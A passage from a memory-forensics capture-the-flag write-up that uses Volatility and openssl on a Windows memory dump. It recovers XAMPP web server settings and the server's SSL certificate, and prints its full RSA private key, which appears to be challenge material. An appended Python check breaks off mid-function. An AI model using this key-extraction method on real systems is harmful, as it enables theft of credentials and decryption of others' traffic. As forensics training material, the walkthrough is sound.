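Feed it the real files with `summarize_non_gui_clients(open(path).read())` after concatenating `access_log/*`; lines that do not match the combined format (for example a truncated last line in a carved file) are skipped rather than crashing the run.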
</pre></div></div><div><br /></div><div><b>Q:</b> When was this version released and how many known vulnerabilities are associated with it?</div><div><b>A:</b> Date of release was Oct 11, 2023 and there are 2 known vulnerabilities.</div><div> #<span style="white-space: pre;"> </span>Version<span style="white-space: pre;"> </span>Date<span style="white-space: pre;"> </span>Vulns</div><div>252<span style="white-space: pre;"> </span>8.4.0<span style="white-space: pre;"> </span>Oct 11 2023<span style="white-space: pre;"> </span>2</div><div><br /></div><div>Wrapping this section up:</div><div><br /></div><div><b>Q:</b> What is the name of the Web Application being used and the platform it is running on?</div><div><b>A:</b> The answer is seen above: DVWA.</div><div> As for the platform, it is XAMPP, see below.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep dvwa
0xe78bf4c54e40 \xampp\htdocs\dvwa\dvwa\css\main.css 216
0xe78bf620d400 \xampp\htdocs\dvwa\config 216
0xe78bf620e530 \xampp\htdocs\dvwa\config 216
0xe78bf6aac8a0 \xampp\mysql\data\dvwa\db.opt 216
0xe78bf6ac6840 \xampp\htdocs\dvwa\vulnerabilities\exec\source\low.php 216
0xe78bf6e4fd40 \xampp\htdocs\dvwa\vulnerabilities\upload\index.php 216
0xe78bf6e5f100 \xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php 216
0xe78bf6e5f420 \xampp\htdocs\dvwa\config\config.inc.php 216
0xe78bf6e619a0 \xampp\htdocs\dvwa\index.php 216
0xe78bf6e635c0 \xampp\htdocs\dvwa\dvwa\js\dvwaPage.js 216
0xe78bf6e63d90 \xampp\htdocs\dvwa\dvwa\js\add_event_listeners.js 216
0xe78bf6e65b40 \xampp\htdocs\dvwa\favicon.ico 216
0xe78bf6e66c70 \xampp\mysql\data\dvwa\users.ibd 216
0xe78bf6e67da0 \xampp\htdocs\dvwa\dvwa\images\logo.png 216
0xe78bf6e680c0 \xampp\mysql\data\dvwa\guestbook.ibd 216
0xe78bf6e68a20 \xampp\htdocs\dvwa\vulnerabilities\upload\source\low.php 216
0xe78bf792b090 \xampp\htdocs\dvwa\vulnerabilities\exec\index.php 216</span>
</pre></div></div><div><br /></div><div>Let's learn a bit about the web server configuration at the time this host was compromised.</div><div><br /></div><div>Create a directory to dump the httpd contents.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir httpd_dump</span>
</pre></div></div><div><br /></div></div><div><div>Locate the memory address of the <i>httpd.conf</i> file.</div></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep httpd.conf
0xe78bf6e61b30 \xampp\apache\conf\httpd.conf 216</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir httpd_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e61b30
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e61b30 httpd.conf file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat</span></pre></div></div><div><br /></div></div><div><div>With the file extracted, let's ask some questions.</div><div><br /></div><div><b>Q:</b> What is the configured "ServerRoot" for the web server?</div><div><b>A:</b> "C:/xampp/apache"</div><div><br /></div><div><b>Q:</b> What port is the server configured to listen on?</div><div><b>A:</b> 80</div><div><br /></div><div><b>Q:</b> What is the "User" name the server is configured to run as?</div><div><b>A:</b> daemon</div><div><br /></div><div><b>Q:</b> What is the "Group" name the server is configured to run as?</div><div><b>A:</b> daemon</div><div><br /></div><div><b>Q:</b> What is the "ServerAdmin" email address?</div><div><b>A:</b> postmaster@localhost</div><div><br /></div><div><b>Q:</b> What is the "ServerName"?</div><div><b>A:</b> ServerName localhost:80</div><div><br /></div><div><b>Q:</b> What is the path to the error log?</div><div><b>A:</b> ErrorLog "logs/error.log"</div><div><br /></div><div><b>Q:</b> What is the current logging level configuration?</div><div><b>A:</b> LogLevel warn</div><div><br /></div><div>Below shows the evidence for the above:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --text --perl-regexp --ignore-case </span><b><span style="color: #fcff01;">'</span></b><span style="color: #fcff01;"><b>^(ServerRoot|Listen|User|Group|ServerAdmin|ServerName|ErrorLog|LogLevel)'</b></span><span style="color: white;"> httpd_dump/file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
ServerRoot "C:/xampp/apache"
Listen 80
User daemon
Group daemon
ServerAdmin postmaster@localhost
ServerName localhost:80
ErrorLog "logs/error.log"
LogLevel warn</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Let's attempt to steal the server's private key and its certificate. This way, we can decrypt any communication that was encrypted with the corresponding public key.</div><div>A similar compromise actually occurred at Microsoft Corp, where a signing key was stolen. </div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | </span><b><span style="color: #fcff01;">grep --perl-regexp 'server\.key|server.crt'</span></b><span style="color: white;">
0xe78bf79354a0 \xampp\apache\conf\ssl.crt\server.crt 216
0xe78bf7938510 \xampp\apache\conf\ssl.key\server.key 216</span>
</pre></div></div><div><br /></div></div><div><div>Create a directory to store the contents.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir ssl_dump</span></pre></div></div></div><div><br /></div><div><div>Grab the certificate first</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf79354a0</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf79354a0 server.crt file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat</span>
</pre></div></div><div><br /></div></div><div><div>Confirm the certificate file<br /><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file </span></b><span style="color: white;">ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat: </span><b><span style="color: #fcff01;">PEM certificate</span></b>
</pre></div></div><div><br /></div></div><div><div>We see above that this is a PEM (Privacy Enhanced Mail) file. These files may contain just the public certificate or the entire SSL chain, which may include the private and public keys along with the root and intermediate certificates. Interesting start. The body of this file is base64 encoded.</div><div><br /></div><div>Confirming we were able to recover the first part.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----</span>
</pre></div></div><div><br /></div></div><div><div>Well, it looks like this file only contains the public key certificate. With this in place, time for some questions.</div><div><br /></div><div><b>Q:</b> What is the server "Certificate" "Serial Number"?</div><div><b>A:</b> b5:c7:52:c9:87:81:b5:03</div><div><br /></div><div><b>Q:</b> What is the server "Certificate" "Validity" period?</div><div><b>A:</b> Validity</div><div> Not Before: Nov 10 23:48:47 2009 GMT</div><div> Not After : Nov 8 23:48:47 2019 GMT</div><div><br /></div><div><b>Q:</b> What is the server "Certificate" "Subject"?</div><div><b>A:</b> Subject: CN = localhost</div><div><br /></div><div><b>Q:</b> What "Public Key Algorithm" is used by the certificate?</div><div><b>A:</b> Public Key Algorithm: rsaEncryption</div><div><br /></div><div><b>Q:</b> How many bits are used for the "Public-Key"?</div><div><b>A:</b> Public-Key: (1024 bit)</div><div><br /></div><div><b>Q:</b> What "Signature Algorithm" is used?</div><div><b>A:</b> sha1WithRSAEncryption</div><div><br /></div><div>Below provides the answer to these questions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl x509 -in ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -text -noout
Certificate:
Data:
Version: 1 (0x0)
Serial Number:
b5:c7:52:c9:87:81:b5:03
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN = localhost
Validity
Not Before: Nov 10 23:48:47 2009 GMT
Not After : Nov 8 23:48:47 2019 GMT
Subject: CN = localhost
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
6a:f1:f3:49:6c:f9:ba:68:5f:6f:f3:27:04:c6:b9:0c:bd:95:
37:34:be:f7:08:66:9a:9b:03:18:41:be:b9:1d:24:33:55:b6:
19:02:1d:54:71:c9:4f:21:5d:68:75:f3:81:52:41:41:c5:93:
c2:1a:7c:e2:7b:c7:4a:24:13:0c:14:9a:4f:a7:10:35:0a:6f:
6a:0f:d3:68:40:ff:48:44:29:9b:45:6a:0c:5c:29:7c:56:2e:
b9:f0:4b:bd:53:5b:2e:42:b1:6c:ad:97:c1:4b:ee:d1:1c:68:
2d:d0:4c:0b:ff:3d:1e:aa:d9:d2:9a:62:38:db:90:f9:7d:8c:
b7:11</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Time to grab the private key</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf7938510</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf7938510 server.key file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ </span><b style="color: white;">file </b><span style="color: white;">ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat: </span><b><span style="color: #fcff01;">PEM RSA private key</span></b><span style="color: white;">
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
-----</span><b><span style="color: #fcff01;">BEGIN RSA PRIVATE KEY</span></b><span style="color: white;">-----
MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5
zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE
ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB
AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK
gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk
nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd
Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn
3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI
rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/
Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7
72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW
Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U
bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs
-----</span><b><span style="color: #fcff01;">END RSA PRIVATE KEY</span></b><span style="color: white;">-----</span>
</pre></div></div><div><br /></div></div><div><div>This now proves that we have the private key. Peeking into the private key:</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -noout -text | head --lines=10
Private-Key: (1024 bit, 2 primes)
modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
...</span>
</pre><div><br /></div></div></div><div><br /></div><div>With the private and public key at hand, here are your questions.</div><div><b>Q:</b> Create and encrypt a file using the stolen key pair.</div><div><b>A:</b> This is shown below.</div><div><br /></div><div>Let's extract the public key from this file.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -pubout > mem_server_pub.pem
writing RSA key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat mem_server_pub.pem
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ
naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ
IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru
U51jDmd6KMmkNP8Z7QIDAQAB
-----END PUBLIC KEY-----</span>
</pre></div></div><div><br /></div><div>Confirm it is the same as what we extracted above from the <i>.pem</i> file.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in mem_server_pub.pem -pubin -text -noout
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)</span>
</pre></div></div><div><br /></div></div><div><div>Looks good! We saw we could get the public key directly from memory (the certificate) or by extracting it from the private key PEM file, which contains both the private and public key components.</div><div><br /></div><div>Let's create a file to show we can now encrypt and decrypt with this private and public key pair.</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo "Welcome to Nik's Total Recall 2024 Memory Forensics Challenge" > stolen_private_key.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge</span>
</pre><div><br /></div></div></div><div><br /></div><div>Encrypting the file using the public key.</div></div><div><br /></div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><span style="color: #fcff01;"><b>-encrypt </b></span><b><span style="color: #fcff01;">-inkey mem_server_pub.pem</span></b><span style="color: white;"> -pubin -in stolen_private_key.txt -out stolen_private_key.txt.enc</span>
</pre></div></div><div><br /></div></div><div><div>Verifying the encrypted data versus the unencrypted. Using <i>xxd</i>, we see this content is now encrypted.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">xxd </span><span style="color: #fcff01;"><b>stolen_private_key.txt.enc</b></span><span style="color: white;">
00000000: aafd f40c 5501 a1e7 c2d2 67c1 64a9 96bd ....U.....g.d...
00000010: 218f 4455 3927 4d48 bd06 5b60 8e68 f872 !.DU9'MH..[`.h.r
00000020: d3f7 1e59 a58f 59ca 02cc 2cdc c9a6 1fc0 ...Y..Y...,.....
00000030: 83cc a903 cbbe b2ca 12be 24f2 450a c788 ..........$.E...
00000040: 2f7b 0502 1780 c944 18a3 857e 599e a9a2 /{.....D...~Y...
00000050: 7dd3 5a1c 3806 ce2d 32d0 4662 d246 feeb }.Z.8..-2.Fb.F..
00000060: 1b87 254d 753c c681 97cb 4f4c cecb 9a43 ..%Mu<....OL...C
00000070: 67d8 7513 2fcd 39eb ad1d 1b00 b5a5 db91 g.u./.9.........</span>
</pre></div></div><div><br /></div></div><div><div>This is the file before it was encrypted.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">xxd stolen_private_key.txt
00000000: 5765 6c63 6f6d 6520 746f 204e 696b 2773 Welcome to Nik's
00000010: 2054 6f74 616c 2052 6563 616c 6c20 3230 Total Recall 20
00000020: 3234 204d 656d 6f72 7920 466f 7265 6e73 24 Memory Forens
00000030: 6963 7320 4368 616c 6c65 6e67 650a ics Challenge.</span>
</pre><div><br /></div></div></div><div><br /></div><div>As seen above, we used the public key to encrypt the content. Let's now use the recovered server private key to decrypt it.<br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><b><span style="color: #fcff01;">-decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat</span></b><span style="color: white;"> -in stolen_private_key.txt.enc > stolen_private_key.txt.dec</span>
</pre></div></div><div><br /></div></div><div><div>Here we go! We are now back to the original text.</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat stolen_private_key.txt.dec
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge</span>
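As an added example, not code from the original post or the challenge material, the following Python performs the same two checks in code with only the standard library: it confirms that the recovered private key and the public key are one RSA key pair (same modulus and exponent, and the private key's own components are internally consistent), and it runs an encrypt-with-public, decrypt-with-private round trip. The two PEM blocks are the private key and the derived public key exactly as printed in the listings above; the minimal DER reader is this example's own, and the round trip uses textbook (unpadded) RSA purely to show that the keys belong together.

```python
import base64

# Private key and derived public key as printed in the listings above
# (Total Recall 2024 challenge material, not production keys).
SERVER_KEY_PEM = """-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5
zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE
ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB
AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK
gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk
nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd
Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn
3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI
rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/
Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7
72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW
Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U
bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs
-----END RSA PRIVATE KEY-----
"""

SERVER_PUB_PEM = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ
naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ
IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru
U51jDmd6KMmkNP8Z7QIDAQAB
-----END PUBLIC KEY-----
"""


def pem_to_der(pem: str) -> bytes:
    """Drop the -----BEGIN/END----- armour and base64-decode the body."""
    body = "".join(l.strip() for l in pem.splitlines() if l.strip() and not l.startswith("-----"))
    return base64.b64decode(body, validate=True)


def der_read(buf: bytes, pos: int = 0):
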